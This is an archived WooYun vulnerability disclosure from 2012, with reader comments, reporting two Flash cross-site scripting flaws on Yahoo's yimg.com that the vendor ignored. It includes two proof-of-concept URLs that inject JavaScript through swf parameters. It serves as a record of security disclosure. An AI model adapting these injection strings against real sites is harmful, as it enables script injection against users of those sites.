当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-08537

漏洞标题:雅虎的yimg.com两个flash跨站

相关厂商:Yahoo/雅虎

漏洞作者: beastk

提交时间:2012-06-20 12:27

修复时间:2012-06-25 12:27

公开时间:2012-06-25 12:27

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-06-20: 细节已通知厂商并且等待厂商处理中
2012-06-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

yimg两个flash过滤不严格,存在跨站,偶是来刷新rank滴!

详细说明:

http://mail.yimg.com/nq/mc/1_0_0/us/pim/userstatus_2.swf?url=http://www.baidu.com&callback=function(){alert(0)}()


http://l.yimg.com/pb/webplayer/0.9.32/flash/swfproxy.swf?onLoad=alert%280%29

漏洞证明:


修复方案:

you know!

版权声明:转载请注明来源 beastk@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-06-25 12:27

厂商回复:

漏洞Rank:6 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2012-06-20 13:05 | wanglaojiu ( 普通白帽子 | Rank:168 漏洞数:39 | 道生一,一生二,二生三,三生万物,万物负...)

    一个牛字了得

  2. 2012-06-20 13:16 | king ( 路人 | Rank:15 漏洞数:2 | 喜爱安全,网络游戏安全应用漏洞挖掘)

    好洞洞

  3. 2012-06-20 13:45 | p.z 认证白帽子 ( 普通白帽子 | Rank:411 漏洞数:40 )

    这个域名有意义吗?

  4. 2012-06-20 13:50 | beastk ( 实习白帽子 | Rank:50 漏洞数:11 | 一不小心高潮了)

    你猜

  5. 2012-06-20 13:51 | d4rkwind ( 路人 | Rank:8 漏洞数:2 | 关注web 安全,产品安全)

    同意 @p.z 观点

  6. 2012-06-20 14:04 | wanglaojiu ( 普通白帽子 | Rank:168 漏洞数:39 | 道生一,一生二,二生三,三生万物,万物负...)

    @p.z yahoo自己的域名

  7. 2012-06-20 14:37 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @wanglaojiu 这种域名专门用来存静态文件的,得不到用户信息,做个URL跳转,到是可以的。。

  8. 2012-06-20 15:18 | wanglaojiu ( 普通白帽子 | Rank:168 漏洞数:39 | 道生一,一生二,二生三,三生万物,万物负...)

    @gainover 不加限制的跳转就会产生网马,而且雅虎自己白名单做到太随心。